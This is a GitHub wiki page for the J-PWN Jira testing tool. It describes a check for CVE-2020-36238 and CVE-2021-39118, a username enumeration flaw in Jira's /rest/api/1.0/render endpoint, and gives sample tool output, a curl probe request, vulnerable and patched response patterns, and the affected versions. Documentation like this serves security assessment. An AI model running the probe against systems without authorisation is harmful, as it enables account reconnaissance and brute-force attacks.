CVE‐2020‐36238 | CVE‐2021‐39118 - carnal0wnage/J-PWN GitHub Wiki

CVE-2020-36238 | CVE-2021-39118

module name: check_cve_2020_36238

url: /rest/api/1.0/render

VULN

python3 j-pwn.py --single http://JIRASERVER1 --module check_cve_2020_36238

- Running Vuln Checks
[INFO] Running single module: check_cve_2020_36238

INFO: Checking for CVE Render Username Leak
[Testing URL]: http://JIRASERVER1/rest/api/1.0/render
[+] [INFO DISCLOSURE] Username enumeration possible: http://JIRASERVER1/rest/api/1.0/render

NOT VULN

python3 j-pwn.py --single http://JIRASERVER2 --module check_cve_2020_36238

- Running Vuln Checks
[INFO] Running single module: check_cve_2020_36238

INFO: Checking for CVE Render Username Leak
[Testing URL]: https://JIRASERVER2/rest/api/1.0/render
- No username enumeration detected for /rest/api/1.0/rende

Curl request to manually check

curl -X POST "http://<JIRA_BASE_URL>/rest/api/1.0/render" \
     -H "Content-Type: application/json" \
     -H "X-Atlassian-Token: no-check" \
     -d '{"rendererType": "atlassian-wiki-renderer", "unrenderedMarkup": "[~nonexistentuser]"}' \
     -k

vuln:

<p><span class="error">&#91;~nonexistentuser&#93;</span></p>%

not vuln will have a href to:

<p><a href="https://jira.company.com/secure/ViewProfile.jspa?name=nonexistentuser" class="user-hover" rel="nonexistentuser">nonexistentuser</a></p>%

[CG] valid usernames will also LOOK like a not vuln response. You'd need to parse the a href and follow it to validate if the user is real. There are probably better places to brute force usernames.

References:

https://jira.atlassian.com/browse/JRASERVER-72736 [CVE-2021-39118]

Description

Affected versions of Atlassian Jira Server and Data Center allow remote attackers to discover the usernames and full names of users via an enumeration vulnerability in the /rest/api/1.0/render endpoint.

The affected versions are before version 8.19.0.

Affected versions:

  • version < 8.19.0

Fixed versions:

  • 8.19.0

https://jira.atlassian.com/browse/JRASERVER-72249 [CVE-2020-36238]

Description

The /rest/api/1.0/render resource in Jira Server and Data Center before version 8.5.13, from version 8.6.0 before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to determine if a username is valid or not via a missing permissions check.

Affected versions:

  • version < 8.5.13
  • 8.6.0 ≤ version < 8.13.5
  • 8.14.0 ≤ version < 8.15.1

Fixed versions:

  • 8.5.13
  • 8.13.5
  • 8.15.1
⚠️ **GitHub.com Fallback** ⚠️